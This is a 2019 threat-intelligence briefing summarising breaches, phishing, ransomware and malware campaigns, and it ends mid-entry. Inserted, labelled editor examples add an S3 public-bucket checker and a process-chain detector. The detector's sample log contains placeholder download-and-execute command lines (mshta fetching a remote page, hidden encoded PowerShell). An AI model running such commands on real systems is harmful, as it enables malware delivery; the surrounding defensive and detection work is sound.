January 8, 2019 - Anomali Threat Research

Weekly Threat Briefing: Another Windows 10 Zero-Day Bug Could Allow Overwriting Files With Random Data

<div id="weekly"><p id="intro">The intelligence in this week's iteration discusses the following threats: <strong>APT28, Danabot, Data breaches, Miori, Phishing, RATs, Ransomware, Roma225, The Dark Overlord, Vulnerabilities, </strong>and<strong> Zebrocy</strong>. The IOCs related to these stories are attached to the Community Threat Briefing and can be used to check your logs for potential malicious activity.</p><div id="trending-threats"><h2 id="trendingthreats">Trending Threats</h2><p><a href="https://www.bleepingcomputer.com/news/security/27-percent-of-passwords-from-town-of-salem-breach-already-cracked/" target="_blank"><b>27% of Passwords From Town of Salem Breach Already Cracked </b></a> (<i>January 5, 2019</i>)<br/> Over 7.6 million unique accounts for the browser-based game "Town of Salem" had various forms of their data exposed after a server was hacked by an unknown actor. The actor gained access to the game's database via a backdoor installed on the server. The data breach compromised user information including emails, hashed passwords (phpass, MD5 (WordPress), MD5 (phpBB3)), IP addresses, game and forum activity, payment information such as billing details, and usernames. The breach became apparent on December 28, 2018, according to "DeHashed," a leaked-information lookup site; since then over 27%, or more than 2.1 million, of the hashed passwords have been cracked via "Hashes[.]org." 
The creators of Town of Salem have removed three PHP files that allowed the threat actor to install the backdoor on the server.<br/> <a href="https://forum.anomali.com/t/27-of-passwords-from-town-of-salem-breach-already-cracked/3381" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://latesthackingnews.com/2019/01/04/another-windows-10-zero-day-bug-could-allow-overwriting-files-with-random-data/" target="_blank"><b>Another Windows 10 Zero-Day Bug Could Allow Overwriting Files With Random Data </b></a> (<i>January 4, 2019</i>)<br/> A Windows 10 zero-day vulnerability was discovered by the security researcher "SandboxEscaper" that could allow an unprivileged user to overwrite files with arbitrary data without administrative privileges. The proof of concept overwrites "pci.sys," a driver the operating system (OS) needs in order to boot, leaving the affected machine in a Denial-of-Service (DoS) state. While this is a working zero-day, it may not work on some CPUs. Microsoft is aware of the vulnerability but has not yet released a patch, as of this writing.<br/> <a href="https://forum.anomali.com/t/another-windows-10-zero-day-bug-could-allow-overwriting-files-with-random-data/3382" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.infosecurity-magazine.com/news/german-politicians-caught-in/" target="_blank"><b>German Politicians Caught in Massive Data Leak</b></a> (<i>January 4, 2019</i>)<br/> A Twitter user under the name "G0d" reportedly released a plethora of personal data and communications from hundreds of German politicians, including Chancellor Angela Merkel. The stolen and released information includes conversations with family members, credit card details, direct debit authorizations, email addresses, internal party communications, mobile phone numbers, and photos of identity cards. 
The data released does not appear to have contained any sensitive political discussion or documents. Members of all parties in the Bundestag were affected, except for members of the AfD, a controversial far-right party. It is currently unclear how the data was obtained, and an investigation is ongoing.<br/> <a href="https://forum.anomali.com/t/german-politicians-caught-in-massive-data-leak/3383" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://thehackernews.com/2019/01/adobe-reader-vulnerabilities.html" target="_blank"><b>Adobe Issues Emergency Patches for Two Critical Flaws in Acrobat and Reader </b></a> (<i>January 3, 2019</i>)<br/> Adobe released a security patch to address two critically-rated vulnerabilities affecting Acrobat and Reader on both macOS and Windows. The first vulnerability, registered as "CVE-2018-16011," is a use-after-free flaw that could allow arbitrary code execution when a user opens a malicious PDF file, granting a threat actor the privileges of the currently logged-on user. The second vulnerability, "CVE-2018-19725," is a security bypass flaw that could allow privilege escalation. The vulnerable versions are Acrobat and Reader DC 2015 version 2015.006.30461 and earlier, 2017 version 2017.011.30110 and earlier, and Continuous version 2019.010.20064 and earlier, on both Windows and macOS.<br/> <a href="https://forum.anomali.com/t/adobe-issues-emergency-patches-for-two-critical-flaws-in-acrobat-and-reader/3384" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.zdnet.com/article/google-chrome-flaw-patched-three-years-after-initial-report/" target="_blank"><b>Google Chrome Flaw Patched Three Years After Initial Report </b></a> (<i>January 3, 2019</i>)<br/> In mid-October 2018, Google quietly released a patch for a "Google Chrome for Android" vulnerability that was first reported in May 2015. 
This vulnerability leaked the device's firmware version, hardware model, and security patch level without the user's knowledge. Researchers from Nightwatch Cybersecurity first discovered the flaw in 2015, when they found that Chrome for Android's User-Agent strings contained information, such as the device name and firmware build, which the desktop User-Agent strings did not. Revealing the device name means that threat actors could potentially map it to the exact smartphone model. The firmware build number lets actors identify the device model as well as the carrier and the specific country in which it is running. It also tells an actor how up to date the device is and which vulnerabilities it may still have, so that those could then be exploited. Google initially stated that Chrome for Android was working as intended, but in October 2018 it shipped a fix for users with v70. However, the fix is still not comprehensive, as device name strings remain accessible and both the device name and build number can still be viewed in "WebView" and "Custom Tabs."<br/> <a href="https://forum.anomali.com/t/google-chrome-flaw-patched-three-years-after-initial-report/3385" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.bleepingcomputer.com/news/security/abine-blur-password-manager-user-data-exposed-online/" target="_blank"><b>Abine Blur Password Manager User Data Exposed Online </b></a> (<i>January 2, 2019</i>)<br/> Abine, the creators of the privacy and password manager "Blur," released a notice on December 31, 2018, that customer information had been exposed on the Internet via a misconfigured file in an Amazon Web Services (AWS) S3 bucket. On December 13, Abine was notified by a security researcher about the misconfigured file, which exposed customers who registered prior to January 2016, approximately 2.4 million users. 
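</p>
<p>Added example by this editor, not code from the briefing, from BleepingComputer or from Abine: the misconfiguration class behind the Blur exposure is an S3 bucket whose ACL or bucket policy grants access to everyone, and the check below decides that from the two documents AWS returns for a bucket. The ACL and policy dicts are constructed here in the shape of the GetBucketAcl and GetBucketPolicy responses (the canonical-user ID, account number and role name are placeholders); no AWS call is made, so it runs offline.</p>

```python
"""Flag an S3 bucket that is open to everyone, from its ACL and its bucket policy.
Added example, not the briefing's or Abine's code; inputs are constructed
documents shaped like AWS GetBucketAcl / GetBucketPolicy responses."""
import json

# Group URIs AWS uses for "anyone on the Internet" and "any AWS account holder".
PUBLIC_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def public_acl_grants(acl):
    """Return [(permission, group_uri)] for every grant made to a public group."""
    hits = []
    for grant in acl.get("Grants", []):
        grantee = grant.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_GROUPS:
            hits.append((grant.get("Permission"), grantee["URI"]))
    return hits


def principal_is_anyone(principal):
    """True for Principal '*' or {'AWS': '*'}, including '*' inside a list."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS")
        return aws == "*" or (isinstance(aws, list) and "*" in aws)
    return False


def public_policy_statements(policy):
    """Return the Sids of unconditioned Allow statements open to any principal."""
    sids = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow" or stmt.get("Condition"):
            continue  # conditioned grants (e.g. aws:SourceVpc) need a manual look, not an automatic flag
        if principal_is_anyone(stmt.get("Principal")):
            sids.append(stmt.get("Sid", "<no Sid>"))
    return sids


def assess_bucket(acl, policy):
    """Combine both checks into one verdict: public if either document opens the bucket."""
    acl_hits = public_acl_grants(acl)
    policy_hits = public_policy_statements(policy)
    return {"public": bool(acl_hits or policy_hits), "acl": acl_hits, "policy": policy_hits}


# Constructed "before": the owner keeps full control, but AllUsers may list the
# bucket and a policy lets any principal fetch every object.
OPEN_ACL = json.loads("""{
  "Owner": {"ID": "owner-canonical-id-placeholder"},
  "Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-canonical-id-placeholder"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"}, "Permission": "READ"}
  ]
}""")
OPEN_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
                 "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"}]
}""")

# Constructed "after": no public ACL grant, and the policy names a single role
# (account id 123456789012 and role name are placeholders).
LOCKED_ACL = {"Owner": OPEN_ACL["Owner"], "Grants": [OPEN_ACL["Grants"][0]]}
LOCKED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [{"Sid": "AppRoleRead", "Effect": "Allow",
                 "Principal": {"AWS": "arn:aws:iam::123456789012:role/example-app-role"},
                 "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-bucket/*"}]
}""")

if __name__ == "__main__":
    print("before:", assess_bucket(OPEN_ACL, OPEN_POLICY))
    print("after: ", assess_bucket(LOCKED_ACL, LOCKED_POLICY))
```

<p>The two checks are deliberately separate because a bucket can be opened by either document alone: a clean policy does not help if the ACL grants AllUsers READ, and vice versa. Conditioned statements are skipped rather than flagged, since whether a condition actually restricts access depends on its keys and needs a human decision.</p>
<p>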
The exposed data includes: email addresses, encrypted passwords, some users' full names, the last and second-to-last IP addresses used to log into Blur, and password hints from the old "MaskMe" product. No sensitive data such as bank information, stored usernames and passwords, or masked emails/phone numbers was exposed. As of this writing, Abine has re-secured the misconfigured S3 file.<br/> <a href="https://forum.anomali.com/t/abine-blur-password-manager-user-data-exposed-online/3386" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://thenextweb.com/security/2019/01/01/twitter-let-someone-promote-an-obvious-paypal-phishing-scam/" target="_blank"><b>Twitter Let Someone Promote an Obvious PayPal Phishing Scam </b></a> (<i>January 2, 2019</i>)<br/> A Twitter post by the unverified account "@PaypalChristm" was publicly promoted by Twitter despite being a phishing scheme. The fake PayPal post promoted an "end of the year sweepstakes" and provided a link, "paypall-christmasgifts[.]com," to verify a person's PayPal details in order to be entered to win unnamed prizes. Clicking the link takes the user to a fake, unsecured PayPal login page. 
If the user logs in, they are directed to a form to verify their card credentials by entering their name, card number, expiry date, CSC, and billing address.<br/> <a href="https://forum.anomali.com/t/twitter-let-someone-promote-an-obvious-paypal-phishing-scam/3387" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link (T1192)</a></p><p><a href="https://www.abc.net.au/news/2019-01-01/victorian-government-employee-directory-data-breach/10676932" target="_blank"><b>Data Breach Sees Victorian Government Employees' Details Stolen </b></a> (<i>January 1, 2019</i>)<br/> 30,000 employees of the Victorian government in Australia found that their work details had been accessed and downloaded by an unknown person. The affected work details include employees' job titles, work emails, work phone numbers, and possibly mobile phone numbers. No banking or other financial information was compromised, but authorities say that employees should be wary because this could lead to future phishing or other social engineering attempts.<br/> <a href="https://forum.anomali.com/t/data-breach-sees-victorian-government-employees-details-stolen/3388" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.databreaches.net/from-thedarkoverlord-9-11-files/" target="_blank"><b>From The Dark Overlord 9/11 Files… A Glimpse into What Your Life is Worth</b></a> (<i>January 1, 2019</i>)<br/> The threat group "The Dark Overlord" (TDO) is attempting to extort money from several organizations that dealt with the litigation and insurance claims following the 9/11 attacks. Companies such as Hiscox Syndicates Ltd, Lloyds of London, and Silverstein Properties have purportedly all been compromised by The Dark Overlord, with a large amount of documentation stolen. 
The threat group is exploiting the emotion tied to 9/11 and its aftermath in order to garner more global attention as well as to scare the organizations into paying the ransom. The extortion note sent to the companies contains a link to a 10 gigabyte (GB) archive of encrypted files and states that if the ransom is not paid, the group will release the decryption keys for certain sets of files in the cache, one set at a time. The Dark Overlord is notorious for exploiting anyone and everyone, with complete disregard, simply to obtain a large illicit profit.<br/> <a href="https://forum.anomali.com/t/from-the-dark-overlord-9-11-files-a-glimpse-into-what-your-life-is-worth/3389" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.zdnet.com/article/ransomware-suspected-in-cyberattack-that-crippled-major-us-newspapers/" target="_blank"><b>Ransomware Suspected in Cyberattack that Crippled Major US Newspapers </b></a> (<i>December 30, 2018</i>)<br/> A ransomware family, suspected to be "Ryuk," affected newspaper printing centers operated by "Tribune Publishing." Tribune Publishing is one of the largest US media companies and owns multiple newspaper outlets such as the Chicago Tribune, Daily Press, Orlando Sentinel, and the Virginia Gazette, among others. The Ryuk ransomware was discussed by Check Point researchers in August 2018; the researchers found that the actors behind the campaigns were targeting organizations that could afford to pay a large ransom, ranging between 15 and 50 bitcoins (approximately $57,655 to $192,184 USD). While the specific details of what malware affected Tribune Publishing have not been confirmed, sources report that a "foreign entity" was behind this attack. 
The entities confirmed to have been affected by this incident include the print editions of the Baltimore Sun, Capital Gazette, and the Chicago Tribune, among others, that were published on December 29 and December 30, 2018.<br/> <a href="https://forum.anomali.com/t/ransomware-suspected-in-cyberattack-that-crippled-major-us-newspapers/3390" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.bleepingcomputer.com/news/security/beware-of-american-express-emails-with-attached-phishing-form/" target="_blank"><b>Beware of American Express Emails With Attached Phishing Form </b></a> (<i>December 29, 2018</i>)<br/> A phishing campaign has been discovered targeting American Express card users with emails claiming that security issues have been raised in relation to the user's card. The email states that there is a security concern requiring attention and contains an attached HTML form that requests various information. The information required in the form includes: American Express card number, birth year, CVV, card ID number, expiration date, first elementary (primary) school name, mother's birth date and maiden name, online account credentials, and security PIN. It then requests that the user enter a new username and password to use. If the user enters this information into the form and submits it, it is sent to the threat actor's remote host. 
After the remote host receives the data, it redirects the user to a legitimate "americanexpress[.]com" page that says "thank you for your feedback."<br/> <a href="https://forum.anomali.com/t/beware-of-american-express-emails-with-attached-phishing-form/3391" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link (T1192)</a></p><p><a href="https://blog.yoroi.company/research/the-enigmatic-roma225-campaign/" target="_blank"><b>The Enigmatic "Roma225" Campaign </b></a> (<i>December 27, 2018</i>)<br/> Cybaze-Yoroi ZLab researchers identified a spear phishing email campaign targeting Italian automotive companies with the intent of infecting victims with the "RevengeRAT" Remote Access Trojan (RAT). The campaign has been dubbed "Roma225" because of the repeated "roma225" strings used throughout the code to separate data fields. The phishing email pretended to be from a senior partner of the Brazilian law firm "Veirano Advogados" and contained a Microsoft PowerPoint attachment that, if opened, requested that macros be enabled. If the macros are enabled, the "mshta.exe" tool runs and downloads the next stage of the malware dropper from a fake blog page. The blog page contains hidden VBScript code that holds the commands to download and install the RevengeRAT payload. RevengeRAT contacts the Command and Control (C2) server to relay the infected machine's information to the threat actors. 
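</p>
<p>Added example by this editor, not code from the briefing, from Cybaze-Yoroi or from the campaign operators: the Roma225 chain (an Office application spawning mshta.exe, which then fetches the next stage) is one of the most reliable things to alert on in process-creation telemetry, and the same rule catches a Word macro launching PowerShell, as in the Emotet malspam described later in this briefing. The log lines below are constructed in a simple key=value|key=value form using Sysmon-style field names (ParentImage, Image, CommandLine); a real Sysmon or EDR feed is XML or JSON, so only parse_event would need adapting. Hostnames use the reserved .invalid suffix and the base64 payload is a placeholder.</p>

```python
"""Detect Office -> script host and script host -> script host process chains.
Added example, not the briefing's or Cybaze-Yoroi's code; log lines are constructed."""
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "wscript.exe", "cscript.exe"}
# PowerShell switches that hide the window or carry a base64 payload: -w hidden, -enc ..., -e ...
STEALTH_FLAGS = re.compile(r"(?:^|\s)-(?:w(?:indowstyle)?\s+hidden|e(?:nc(?:odedcommand)?)?\s)")


def basename(path):
    """Lower-cased file name of a Windows path; tolerates forward slashes."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_event(line):
    """Split 'key=value|key=value' into a dict; only the first '=' of a field separates key from value."""
    event = {}
    for field in line.split("|"):
        key, _, value = field.partition("=")
        event[key.strip()] = value.strip()
    return event


def classify(event):
    """Return the matching rule name, or None for a benign parent/child pair."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        return "office-spawned-script-host"  # the macro stage: POWERPNT/WINWORD -> mshta/powershell
    if parent in SCRIPT_HOSTS and child in SCRIPT_HOSTS:
        return "script-host-chain"           # the next stage: mshta -> powershell, wscript -> powershell
    return None


def enrich(event):
    """Context an analyst wants beside the alert: a remote URL or stealth flags in the command line."""
    cmd = event.get("CommandLine", "")
    return {
        "remote_url": bool(re.search(r"https?://", cmd, re.IGNORECASE)),
        "stealth_flags": bool(STEALTH_FLAGS.search(cmd.lower())),
    }


def detect(lines):
    """Run every line through classify(); return one alert dict per matching event."""
    alerts = []
    for line in lines:
        event = parse_event(line)
        rule = classify(event)
        if rule:
            alerts.append({"time": event.get("UtcTime"), "rule": rule,
                           "parent": basename(event["ParentImage"]),
                           "child": basename(event["Image"]), **enrich(event)})
    return alerts


# Constructed sample telemetry; paths follow the standard Office/Windows layout.
SAMPLE_LOG = [
    r"UtcTime=2018-12-27 10:14:03|ParentImage=C:\Program Files\Microsoft Office\Office16\POWERPNT.EXE|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta.exe http://blog-lookalike.invalid/post.html",
    r"UtcTime=2018-12-27 10:14:09|ParentImage=C:\Windows\System32\mshta.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -nop -w hidden -enc <base64-placeholder>",
    r"UtcTime=2018-12-27 10:20:00|ParentImage=C:\Windows\explorer.exe|Image=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|CommandLine=WINWORD.EXE /n",
    r"UtcTime=2018-12-24 09:02:11|ParentImage=C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell -w hidden -e <base64-placeholder>",
    r"UtcTime=2018-12-24 09:05:30|ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell Get-Process",
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

<p>Run against the sample, the first, second and fourth lines produce alerts and the explorer-launched Word and the admin's cmd-launched PowerShell do not; the parent/child relationship does the work, and the URL and flag checks only add context for triage. cmd.exe is intentionally left out of SCRIPT_HOSTS because administrators launch PowerShell from it constantly; add it only with an allow-list in place.</p>
<p>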
At the time of this writing, it is unclear who is behind the attack and why they are targeting these specific organizations.<br/> <a href="https://forum.anomali.com/t/the-enigmatic-roma225-campaign/3392" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a> | <a href="https://ui.threatstream.com/ttp/947223">[MITRE ATT&amp;CK] Mshta (T1170)</a> | <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a></p><p><a href="https://www.cyberscoop.com/bevmo-online-payment-breach-ncr/" target="_blank"><b>BevMo Payment Breach Affects Thousands, with Researchers Pointing to Magecart</b></a> (<i>December 27, 2018</i>)<br/> The California-based alcoholic beverage retailer "BevMo" has confirmed that it was affected by a data breach that took place from August 2, 2018 through September 26, 2018. Threat actors were able to inject data-stealing JavaScript into BevMo's checkout page, which stole payment information during that period. The stolen information consists of the following: card numbers, expiration dates and security codes, names, and phone numbers. The incident is believed to affect approximately 14,579 customers as of the time of this writing. Furthermore, BevMo has stated that the breach has been contained and that its service provider is continuing to monitor for any suspicious behavior. 
Researchers believe that this website compromise and subsequent theft was possibly conducted by the financially-motivated threat group "Magecart," due to similar tactics observed in prior incidents.<br/> <a href="https://forum.anomali.com/t/bevmo-payment-breach-affects-thousands-with-researchers-pointing-to-magecart/3393" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947201">[MITRE ATT&amp;CK] Scripting (T1064)</a> | <a href="https://ui.threatstream.com/ttp/947243">[MITRE ATT&amp;CK] Input Capture (T1056)</a></p><p><a href="https://www.bleepingcomputer.com/news/security/junglesec-ransomware-infects-victims-through-ipmi-remote-consoles/" target="_blank"><b>JungleSec Ransomware Infects Victims Through IPMI Remote Consoles </b></a> (<i>December 26, 2018</i>)<br/> The ransomware called "JungleSec," first identified in November 2018, has been found to be infecting users through unsecured Intelligent Platform Management Interfaces (IPMIs), according to BleepingComputer reporters. Victims of the ransomware told reporters that their Linux servers were infected with JungleSec via "unsecured IPMI devices." IPMI interfaces are used by IT administrators to remotely access a machine. Before IPMIs were identified as the initial infection vector, it was unknown how targets, including Mac and Windows machines, were being infected. Improperly configured and unsecured IPMIs were observed being used by unknown threat actors to install the ransomware on a machine. 
If a machine is infected, the user is presented with a ransom note that demands 0.3 bitcoins ($1,119 USD) to decrypt files.<br/> <a href="https://forum.anomali.com/t/junglesec-ransomware-infects-victims-through-ipmi-remote-consoles/3394" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947227">[MITRE ATT&amp;CK] Brute Force (T1110)</a> | <a href="https://ui.threatstream.com/ttp/947256">[MITRE ATT&amp;CK] Uncommonly Used Port (T1065)</a></p><p><a href="https://www.infosecurity-magazine.com/news/amazon-order-confirmation-phishing/" target="_blank"><b>Amazon Order Confirmation Phishing Scam</b></a> (<i>December 24, 2018</i>)<br/> A sophisticated malspam campaign was observed delivering fraudulent Amazon order confirmations, according to EdgeWave. The messages used subject lines such as "Your Amazon.com order," "Amazon order details," and "Your order 162-2672000-0034071 has shipped." The emails show a forged order confirmation for the shipment of an item but contain no information about what was sent, practically forcing the recipient to click the "Order Details" button. Clicking the button downloads a Word document, which then requests that macros be enabled. 
If the user enables the macros, a PowerShell command is triggered that ultimately installs the Emotet banking trojan on the machine.<br/> <a href="https://forum.anomali.com/t/amazon-order-confirmation-phishing-scam/3395" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link (T1192)</a> | <a href="https://ui.threatstream.com/ttp/947287">[MITRE ATT&amp;CK] PowerShell (T1086)</a></p><p><a href="https://www.zdnet.com/article/over-19000-orange-modems-are-leaking-wifi-credentials/" target="_blank"><b>Over 19,000 Orange Modems are Leaking WiFi Credentials</b></a> (<i>December 24, 2018</i>)<br/> Security researcher Troy Mursch discovered that almost 20,000 "Orange Livebox ADSL" modems were leaking WiFi credentials. He identified at least one threat actor scanning for modems affected by a known vulnerability, registered as "CVE-2018-20377," that could allow remote access to the WiFi password and network ID of the modem's internal network. The vulnerability could enable on-location proximity attacks, in which an actor targets high-profile victims, such as large organizations or wealthy homes, uses the password to join the network, and then launches further attacks on nearby devices. 
This vulnerability could also allow threat actors to build botnets, as well as obtain sensitive information.<br/> <a href="https://forum.anomali.com/t/over-19-000-orange-modems-are-leaking-wifi-credentials/3396" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.bleepingcomputer.com/news/security/info-on-over-500-000-students-and-staff-exposed-in-san-diego-school-district-hack/" target="_blank"><b>Info on Over 500,000 Students and Staff Exposed in San Diego School District Hack</b></a> (<i>December 22, 2018</i>)<br/> Over half a million students going back to the 2008-2009 school year, their parents, and staff of the San Diego Unified School District (SDUSD) are believed to have been affected by a data breach. An unauthorized user sent phishing emails to staff to obtain login credentials for the district's network services. The unknown threat actor had access to information such as: dates of birth, home addresses, mailing addresses, names, social security numbers, staff benefits information, staff payroll and compensation figures, student ID numbers, and telephone numbers. In addition, student enrollment information such as schedules, health data, schools of attendance, transfer information, recorded legal notices, and attendance data was accessible, as was data on students' parents or guardians and the emergency contacts of the district's employees. It is not clear what the threat actor did with the information they had access to, but they were able to access it for an extended period, from January 2018 until November 2018. 
According to the district, it had discovered the intrusion in October but did not disclose it until now so that it could investigate without alerting the threat actor.<br/> <a href="https://forum.anomali.com/t/info-on-over-500-000-students-and-staff-exposed-in-san-diego-school-district-hack/3397" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947106">[MITRE ATT&amp;CK] Spearphishing Link (T1192)</a> | <a href="https://ui.threatstream.com/ttp/947180">[MITRE ATT&amp;CK] Spearphishing Attachment (T1193)</a></p><p><a href="https://www.infosecurity-magazine.com/news/ibm-kernelbased-vulnerability/" target="_blank"><b>IBM Kernel-Based Vulnerability Discovered</b></a> (<i>December 21, 2018</i>)<br/> Researchers from Trustwave found a kernel-level vulnerability in IBM's "Trusteer Rapport" driver for macOS. Trusteer Rapport is an endpoint protection solution designed to protect users against financial malware and phishing attacks. This vulnerability could allow privilege escalation on the local device, letting a potential threat actor disable Trusteer completely. According to Trustwave, IBM was unable to develop a patch for the vulnerability within the 90-day disclosure timeframe, despite Trustwave extending it by an extra 30 days before disclosing the vulnerability to the public. The bug is the result of a signedness issue.<br/> <a href="https://forum.anomali.com/t/ibm-kernel-based-vulnerability-discovered/3398" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://www.infosecurity-magazine.com/news/caribou-coffee-card-breach-hits/" target="_blank"><b>Caribou Coffee Card Breach Hits 265 Stores</b></a> (<i>December 21, 2018</i>)<br/> The US coffee chain "Caribou Coffee" reported that it had suffered a data breach that impacted payment cards. 
They discovered unusual network traffic on November 28, 2018 and found that there had been unauthorized access to their Point-of-Sale (POS) systems. The company stated that customers who visited one of its locations between August 28, 2018 and December 3, 2018, are likely to have had their names, card numbers, CVVs, and expiration dates compromised. According to Caribou Coffee, "payments made through your Caribou Coffee Perks account or other loyalty account were not affected. Any catering orders placed online with Bruegger's Bagels, Einstein Bros. Bagels, Manhattan Bagel and Noah's NY Bagels were also not affected by this breach."<br/> <a href="https://forum.anomali.com/t/caribou-coffee-card-breach-hits-265-stores/3399" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/" target="_blank"><b>With Mirai Comes Miori: IoT Botnet Delivered via ThinkPHP Remote Code Execution </b></a> (<i>December 20, 2018</i>)<br/> Trend Micro researchers have published their analysis of a variant of the "Mirai" Internet-of-Things (IoT) malware called "Miori." Multiple Mirai variants have appeared since the malware's source code was leaked in 2016. The Miori malware was found to be propagating via "a Remote Code Execution (RCE) vulnerability in the PHP framework, ThinkPHP." The vulnerability has been observed being used by other Mirai variants (APEP, IZ1H9), details of which were first mentioned on December 11, 2018. The vulnerability affects ThinkPHP versions before "5.0.23 and 5.1.31." 
Additionally, researchers found that the actors behind Miori "used the ThinkPHP RCE to make vulnerable machines download and execute their malware," and subsequently use the "Telnet" protocol to brute force other IPs.<br/> <a href="https://forum.anomali.com/t/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution/3400" target="_blank">Click here for Anomali recommendation</a></p><p><a href="https://blog.trendmicro.com/trendlabs-security-intelligence/android-wallpaper-apps-found-running-ad-fraud-scheme/" target="_blank"><b>Android Wallpaper Apps Found Running Ad Fraud Scheme</b></a> (<i>December 19, 2018</i>)<br/> At least 15 different fake wallpaper applications that were secretly committing advertisement fraud were discovered in the Google Play store by Trend Micro researchers. The applications were primarily downloaded in Germany, Italy, Taiwan, and the US, and were downloaded over 220,000 times. The fake applications promised aesthetically appealing wallpaper backgrounds and had several good reviews to appear legitimate. Once installed, the application decodes the Command and Control (C2) server address and mutes the entire process so the user does not notice it. The application sends an HTTP GET request to receive a JSON-formatted list of the advertisement feeds the application is intending to fetch. 
The ads run in the background of the infected device and garner a profit for the threat actors who developed the applications.<br/> <a href="https://forum.anomali.com/t/android-wallpaper-apps-found-running-ad-fraud-scheme/3401" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947263">[MITRE ATT&amp;CK] Spearphishing via Service (T1194)</a></p><p><a href="https://asert.arbornetworks.com/danabots-travels-a-global-perspective/" target="_blank"><b>Danabot's Travels, A Global Perspective </b></a> (<i>December 19, 2018</i>)<br/> The "Danabot" banking trojan has undergone consistent growth throughout 2018 since its discovery in May of this year, according to Arbor Networks researchers. Danabot is predominantly distributed via malspam. The malware is described as a modular banking trojan capable of stealing financial credentials, primarily through web-injection attacks that utilize multiple Dynamic Link Libraries (DLLs). In addition, Danabot has remote access features via Virtual Network Computing (VNC) and Remote Desktop Protocol (RDP) that allow threat actors to conduct further malicious activity on an infected machine. 
Researchers note that Danabot is approaching the sophistication of notorious banking trojans such as Dridex and Trickbot due to the dynamic and active development of the malware by various actors.<br/> <a href="https://forum.anomali.com/t/danabots-travels-a-global-perspective/3402" target="_blank">Click here for Anomali recommendation</a><br/> <b>MITRE ATT&amp;CK: </b> <a href="https://ui.threatstream.com/ttp/947139">[MITRE ATT&amp;CK] Remote Access Tools (T1219)</a></p><p><a href="https://www.menlosecurity.com/blog/a-jar-full-of-problems-for-financial-services-companies" target="_blank"><b>A "JAR" Full of Problems for Financial Services Companies</b></a> (<i>December 19, 2018</i>)<br/> An email campaign targeting banks and financial services organizations has been observed by researchers at Menlo Labs that attempts to trick victims into clicking links that install malware. The campaign has been active in the UK and US since August 2018 and uses Google's Cloud Storage service, "storage.googleapis[.]com," to host the malicious payload so that it appears legitimate. The unknown threat actors use malicious URLs because detection rates for them are much lower, even on machines with antivirus and spam filters, if the URL is not already in a threat repository. The malicious links install either a VBScript payload or a JAR file. 
